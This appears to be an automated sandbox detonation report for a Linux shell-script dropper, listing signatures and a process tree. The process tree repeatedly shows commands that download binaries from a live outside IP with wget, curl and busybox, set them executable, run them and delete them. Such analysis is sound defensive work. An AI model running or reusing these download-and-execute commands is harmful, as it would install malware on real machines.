SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-21 07:02

Reported

2024-11-21 07:04

Platform

debian9-mipsel-20240226-en

Max time kernel

127s

Max time network

132s

Command Line

[/tmp/9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0 /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0 N/A
N/A /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe N/A
N/A /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz N/A
N/A /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne N/A
N/A /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo N/A
N/A /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw N/A
N/A /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8 /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8 N/A
N/A /tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ /tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ N/A
N/A /tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO /tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO N/A
N/A /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ N/A
N/A /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG N/A
N/A /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc N/A
N/A /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a N/A
N/A /tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6 /tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6 N/A
N/A /tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6 /tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6 N/A
N/A /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc N/A
N/A /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a N/A
N/A /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe N/A
N/A /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0 /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0 N/A
N/A /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne N/A
N/A /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz N/A
N/A /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ N/A
N/A /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG N/A
N/A /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo N/A
N/A /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw N/A
N/A /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8 /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8 N/A
N/A /tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ /tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ N/A
N/A /tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO /tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0 /usr/bin/curl N/A
File opened for modification /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz /usr/bin/curl N/A
File opened for modification /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw /usr/bin/curl N/A
File opened for modification /tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ /usr/bin/curl N/A
File opened for modification /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0 /usr/bin/curl N/A
File opened for modification /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc /usr/bin/curl N/A
File opened for modification /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz /usr/bin/curl N/A
File opened for modification /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo /usr/bin/curl N/A
File opened for modification /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe /usr/bin/curl N/A
File opened for modification /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe /usr/bin/curl N/A
File opened for modification /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo /usr/bin/curl N/A
File opened for modification /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a /usr/bin/curl N/A
File opened for modification /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw /usr/bin/curl N/A
File opened for modification /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ /usr/bin/curl N/A
File opened for modification /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne /usr/bin/curl N/A
File opened for modification /tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6 /usr/bin/curl N/A
File opened for modification /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG /usr/bin/curl N/A
File opened for modification /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8 /usr/bin/curl N/A
File opened for modification /tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ /usr/bin/curl N/A
File opened for modification /tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO /usr/bin/curl N/A
File opened for modification /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG /usr/bin/curl N/A
File opened for modification /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc /usr/bin/curl N/A
File opened for modification /tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6 /usr/bin/curl N/A
File opened for modification /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ /usr/bin/curl N/A
File opened for modification /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8 /usr/bin/curl N/A
File opened for modification /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne /usr/bin/curl N/A
File opened for modification /tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO /usr/bin/curl N/A
File opened for modification /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a /usr/bin/curl N/A

Processes

/tmp/9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh

[/tmp/9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]

/bin/chmod

[chmod 777 tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]

/tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0

[./tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]

/bin/rm

[rm tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]

/usr/bin/wget

[wget http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]

/bin/chmod

[chmod 777 cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]

/tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe

[./cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]

/bin/rm

[rm cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]

/usr/bin/wget

[wget http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]

/bin/chmod

[chmod 777 e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]

/tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz

[./e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]

/bin/rm

[rm e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]

/usr/bin/wget

[wget http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]

/bin/chmod

[chmod 777 tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]

/tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne

[./tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]

/bin/rm

[rm tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]

/usr/bin/wget

[wget http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]

/bin/chmod

[chmod 777 EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]

/tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo

[./EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]

/bin/rm

[rm EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]

/usr/bin/wget

[wget http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]

/bin/chmod

[chmod 777 UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]

/tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw

[./UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]

/bin/rm

[rm UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]

/usr/bin/wget

[wget http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]

/bin/chmod

[chmod 777 nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]

/tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8

[./nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]

/bin/rm

[rm nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]

/usr/bin/wget

[wget http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]

/bin/chmod

[chmod 777 zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]

/tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ

[./zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]

/bin/rm

[rm zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]

/usr/bin/wget

[wget http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]

/bin/chmod

[chmod 777 UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]

/tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO

[./UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]

/bin/rm

[rm UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]

/usr/bin/wget

[wget http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]

/bin/chmod

[chmod 777 JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]

/tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ

[./JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]

/bin/rm

[rm JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]

/usr/bin/wget

[wget http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]

/bin/chmod

[chmod 777 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]

/tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG

[./7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]

/bin/rm

[rm 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]

/usr/bin/wget

[wget http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]

/bin/chmod

[chmod 777 xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]

/tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc

[./xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]

/bin/rm

[rm xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]

/usr/bin/wget

[wget http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]

/bin/chmod

[chmod 777 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]

/tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a

[./0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]

/bin/rm

[rm 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]

/usr/bin/wget

[wget http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]

/bin/chmod

[chmod 777 GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]

/tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6

[./GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]

/bin/rm

[rm GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]

/usr/bin/wget

[wget http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]

/bin/chmod

[chmod 777 GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]

/tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6

[./GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]

/bin/rm

[rm GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]

/usr/bin/wget

[wget http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]

/bin/chmod

[chmod 777 xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]

/tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc

[./xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]

/bin/rm

[rm xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]

/usr/bin/wget

[wget http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]

/bin/chmod

[chmod 777 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]

/tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a

[./0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]

/bin/rm

[rm 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]

/usr/bin/wget

[wget http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]

/bin/chmod

[chmod 777 cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]

/tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe

[./cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]

/bin/rm

[rm cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]

/usr/bin/wget

[wget http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]

/bin/chmod

[chmod 777 tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]

/tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0

[./tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]

/bin/rm

[rm tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]

/usr/bin/wget

[wget http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]

/bin/chmod

[chmod 777 tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]

/tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne

[./tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]

/bin/rm

[rm tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]

/usr/bin/wget

[wget http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]

/bin/chmod

[chmod 777 e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]

/tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz

[./e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]

/bin/rm

[rm e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]

/usr/bin/wget

[wget http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]

/bin/chmod

[chmod 777 JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]

/tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ

[./JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]

/bin/rm

[rm JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]

/usr/bin/wget

[wget http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]

/bin/chmod

[chmod 777 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]

/tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG

[./7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]

/bin/rm

[rm 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]

/usr/bin/wget

[wget http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]

/bin/chmod

[chmod 777 EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]

/tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo

[./EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]

/bin/rm

[rm EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]

/usr/bin/wget

[wget http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]

/bin/chmod

[chmod 777 UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]

/tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw

[./UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]

/bin/rm

[rm UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]

/usr/bin/wget

[wget http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]

/bin/chmod

[chmod 777 nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]

/tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8

[./nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]

/bin/rm

